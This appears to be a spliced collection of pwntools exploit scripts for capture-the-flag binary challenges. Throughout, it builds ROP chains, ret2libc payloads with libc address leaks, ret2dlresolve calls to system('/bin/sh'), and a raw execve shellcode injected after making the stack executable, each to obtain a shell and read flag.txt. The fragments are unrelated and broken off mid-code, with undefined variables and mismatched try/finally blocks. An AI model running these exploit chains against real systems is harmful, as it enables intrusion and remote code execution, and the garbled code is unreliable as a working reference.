def __init__(self, local=True, binary='', ip='', port=0):
self.elf = pwn.ELF(binary)
self.libc = self.elf.libc
self.rop_libc = pwn.ROP(self.libc)
self.rop_elf = pwn.ROP(self.elf)
if local:
self.proc = pwn.process(binary)
else:
self.proc = pwn.remote(ip, port)
def build_rop():
rop = pwn.ROP(remote_binary)
rop.win_fn1(0xDEADBEEF)
rop.win_fn2(0xBAADCAFE, 0xCAFEBABE, 0xABADBABE)
rop.win_fn()
return rop.chain()
def create_rop():
rop = pwn.ROP(remote_binary)
rop.leapA()
rop.raw(0x8048690)
rop.leap2(0xDEADBEEF)
rop.display_flag()
return rop.chain()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
pop_rsi = pwn.p64(
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address)
print(pop_rdi)
print(pop_rsi)
payload = b"A" * 72
payload += pop_rdi
payload += pwn.p64(0xdeadbeef)
payload += pop_rsi
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(elf.sym['win'])
print(payload, len(payload))
pr.sendafter("joke\n", payload)
pr.sendline()
pr.sendline("cat flag.txt")
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote=False):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
print(pr.readline())
"""
Find padding via gdb
gef➤ info frame
Stack level 0, frame at 0x7fffffffda48:
rip = 0x401153 in vuln; saved rip = 0x6161616161616164
called by frame at 0x7fffffffda58
Arglist at 0x6161616161616163, args:
Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50
Saved registers:
rip at 0x7fffffffda48
gef➤ pattern search 0x6161616161616164
[+] Searching '0x6161616161616164'
[+] Found at offset 24 (little-endian search) likely
[+] Found at offset 17 (big-endian search)
"""
payload = b'a' * 24
# gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33'
pop_rdx = pwn.p64(0x4010de)
mov_rax_0 = pwn.p64(0x401002)
mov_rax_1 = pwn.p64(0x40100a)
mov_rdi_1 = pwn.p64(0x401012)
xor_rdi_0x53 = pwn.p64(0x40107d)
xor_rdi_0x56 = pwn.p64(0x40101b)
xor_rdi_0x198 = pwn.p64(0x4010c3)
xor_rdi_0x19b = pwn.p64(0x40104c)
if remote:
payload += xor_rdi_0x56
payload += xor_rdi_0x53
else:
payload += xor_rdi_0x19b
payload += xor_rdi_0x198
payload += pop_rdx
payload += pwn.p64(0x19) # read length
payload += mov_rax_0
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
payload += mov_rax_1
payload += mov_rdi_1
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
pr.sendline(payload)
print(pr.readall(2))
finally:
pr.close()
def get_ret2dlresolve(elf, offset):
# Pwntools script kiddie solution
bss = elf.bss(0x100 - 8)
ret2dl = pwn.Ret2dlresolvePayload(elf, "system", ["/bin/sh"], bss)
rop = pwn.ROP(elf)
rop.raw(rop.ret.address) # ret gadget to align stack
rop.gets(bss)
rop.ret2dlresolve(ret2dl)
return b"A" * offset + rop.chain() + b"\n" + ret2dl.payload
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF('baby_bof')
libc = pwn.ELF('libc-2.31.so')
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
payload = b'A' * 18
payload += pop_rdi
payload += pwn.p64(elf.got['puts'])
payload += pwn.p64(elf.plt['puts'])
payload += pwn.p64(elf.sym['vuln'])
pr.sendlineafter("me\n", payload)
print(pr.readline())
out = pr.readline().strip()
puts_addr = int.from_bytes(out[:8], 'little')
print('puts @', hex(puts_addr))
"""Also works
if remote:
sys = puts_addr - 0x32190
bin_sh = puts_addr + 0x13000a
else:
sys = puts_addr - 0x2e660
bin_sh = puts_addr + 0x116eb6
"""
libc.address = puts_addr - libc.symbols['puts']
sys = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
print('sys @', hex(sys))
print('bin_sh @', hex(bin_sh))
ret = pwn.p64(rop.find_gadget(['ret']).address)
payload = b'A' * 18
payload += ret
payload += pop_rdi
payload += pwn.p64(bin_sh)
payload += pwn.p64(sys)
payload += pwn.p64(elf.sym['vuln'])
print(payload)
pr.sendafter('me\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def exploit():
pr = pwn.connect(host, port)
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
payload = b"A" * 32
rop.set_lock()
rop.shell()
payload += rop.chain()
print('len:', len(payload), payload)
pr.sendlineafter("What would a hero say ?\n>>> ", payload)
print(pr.readall(2))
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
main_addr = pr.readline().strip().decode()
main_addr = int(main_addr[main_addr.find('street ') + 7:], 16)
print('main @', hex(main_addr))
ca_addr = main_addr + (elf.sym['california'] - elf.sym['main'])
si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main'])
loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main'])
print('ca @', hex(ca_addr))
print('si @', hex(si_addr))
print('loss @', hex(loss_addr))
"""
california() => win_land='/bin'
silicon_valley() => win_land='/bin/sh'
loss(0x1337c0de, 0xdeadc0de-0x1337c0de)
"""
pop_rdi = pwn.p64(main_addr +
(rop.find_gadget(['pop rdi', 'ret']).address -
elf.sym['main']))
pop_rsi = pwn.p64(main_addr + (
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address -
elf.sym['main']))
payload = b'A' * 40
payload += pwn.p64(ca_addr)
payload += pwn.p64(si_addr)
payload += pop_rdi + pwn.p64(0x1337c0de)
payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000)
payload += pwn.p64(loss_addr)
print(len(payload), payload)
pr.sendafter('often?\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def attack(remote):
pr = None
if remote:
pr = pwn.remote(host, port)
else:
pr = pwn.process(target)
try:
libc = CDLL('libc.so.6')
num = (libc.rand() % 100) + 1
pr.sendlineafter("What number would you like to guess?\n", str(num))
elf = pwn.ELF(target, False)
rop = pwn.ROP(elf)
payload = b'A' * 120
payload += pwn.p64(rop.find_gadget(['pop rdx', 'ret']).address)
payload += pwn.p64(elf.sym['__stack_prot'])
payload += pwn.p64(rop.find_gadget(['pop rax', 'ret']).address)
payload += pwn.p64(7) # PROT_READ|PROT_WRITE|PROT_EXEC
payload += pwn.p64(
0x0000000000419127
) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
# 0x0000000000419127 : mov qword ptr [rdx], rax ; ret
payload += pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
payload += pwn.p64(elf.sym['__libc_stack_end'])
payload += pwn.p64(elf.sym['_dl_make_stack_executable'])
payload += pwn.p64(
0x0000000000451974
) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
# 0x0000000000451974 : push rsp ; ret
# http://shell-storm.org/shellcode/files/shellcode-603.php
shellcode = b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
payload += shellcode
print('payload:', payload, 'len:', len(payload))
pr.send(payload)
pr.readuntil("New winner!\nName? ")
pr.sendline()
print(pr.readline())
#pr.interactive()
pr.sendline("cat flag.txt;")
print('flag:', pr.readall(timeout=2).decode())
except Exception as e:
print(e)
finally:
pr.close()
s = requests.Session()
token = gen_token(s, IP, PORT)
print 'token: ', token
headers = {
'content-type': 'application/json',
}
url = 'http://%s:%s/api/upload?token=%s' % (IP, PORT, token)
binary_filename = './build/pwn'
binary = pwn.ELF(binary_filename)
binary_rop = pwn.ROP(binary)
libc = pwn.ELF('/lib/x86_64-linux-gnu/libc.so.6')
bin_sh_offset = next(libc.search('/bin/sh\x00'))
pop_rdi = get_gadget(binary_rop, ['pop rdi', 'ret'])
pop_rsi = get_gadget(binary_rop, ['pop rsi', 'ret'])
pop_rdx_rbx = get_gadget(binary_rop, ['pop rdx', 'pop rbx', 'ret'])
pop_rsp = get_gadget(binary_rop, ['pop rsp', 'ret'])
read = binary.plt['read']
write = binary.plt['write']
fcntl = binary.plt['fcntl']
malloc_got = binary.got['malloc']
malloc_offset = libc.symbols['malloc']
import pwn
import sys
# Setup enviroment
process = pwn.process("./write4")
pwn.context(os="linux", arch="amd64")
elf = pwn.ELF("write4")
# Get cmd and pad
cmd = "/bin/sh" if len(sys.argv) == 1 else sys.argv[1]
cmd = cmd + 8 * "\x00" if len(
cmd) % 8 == 0 else cmd + (8 - (len(cmd) % 8)) * "\x00"
# Generate rop
rop = pwn.ROP(elf)
for i in range(0, len(cmd), 8):
rop.raw(rop.find_gadget(["pop r14", "pop r15", "ret"]))
rop.raw(elf.bss() + i)
rop.raw(cmd[i:i + 8])
pwn.log.info("Found gadget mov? " + str(rop.find_gadget(["mov r14, r15"])))
rop.raw(elf.symbols["usefulGadgets"]) # mov r14, r15
rop.system(elf.bss())
pwn.log.info(rop.dump())
# Execute command
process.readline()
process.readline()
process.readline()
process.readline()
payload = "A" * 40 + rop.chain()
process.sendline(payload)
def create_rop():
binary = pwn.ELF.from_assembly(
"pop eax;pop ebx;pop ecx"
)
rop = pwn.ROP(binary)#remote_binary)
return rop.chain()
import pwn
host = "127.0.0.1"
port = 1337
remote = False
binary_path = './vuln'
libc_path = './libc.so.6'
ld_path = "./ld-2.27.so"
binary = pwn.ELF(binary_path)
libc = pwn.ELF(libc_path)
rop_binary = pwn.ROP(binary)
if remote:
r = pwn.remote(host, port)
else:
# r = pwn.process(binary_path)
r = pwn.process([ld_path, binary_path], env={"LD_PRELOAD": libc_path})
r.interactive()
r.close()
io.recvuntil(":")
io.sendline("asd")
io.recvuntil(":")
io.sendline("asd")
io.recvuntil(":")
io.sendline("25")
io.recvline()
io.recvline()
io.recvline()
io.recvline()
io.recvline()
rop_puts = pwn.ROP(exe)
rop_puts.call(exe.plt['puts'], [exe.got['puts']])
rop_puts.call(exe.symbols['main'])
raw_rop = rop_puts.chain()
#io.recvuntil("deserve it:")
io.sendline(b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa" + raw_rop)
io.recvuntil("!\n")
libc_leak = io.recv(6)
print("libc_leak :: " + hex(pwn.u64(libc_leak + b"\x00\x00")))
base = pwn.u64(libc_leak + b'\x00\x00') - libc.symbols['puts']
print("base :: " + hex(base))
import pwn
pwn.context.binary = e = pwn.ELF("./resolve")
# p = pwn.process("./resolve")
p = pwn.remote("pwn.utctf.live", 5435)
if pwn.args.GDB:
pwn.gdb.attach(
p,
gdbscript="""
break *(&main+29)
continue
""",
)
r = pwn.ROP(e)
d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"])
r.raw(0x401159) # ret gadget to align stack
r.gets(d.data_addr)
r.ret2dlresolve(d)
payload = pwn.fit({0x10: r.chain()}) + b"\n" + d.payload
p.sendline(payload)
p.interactive()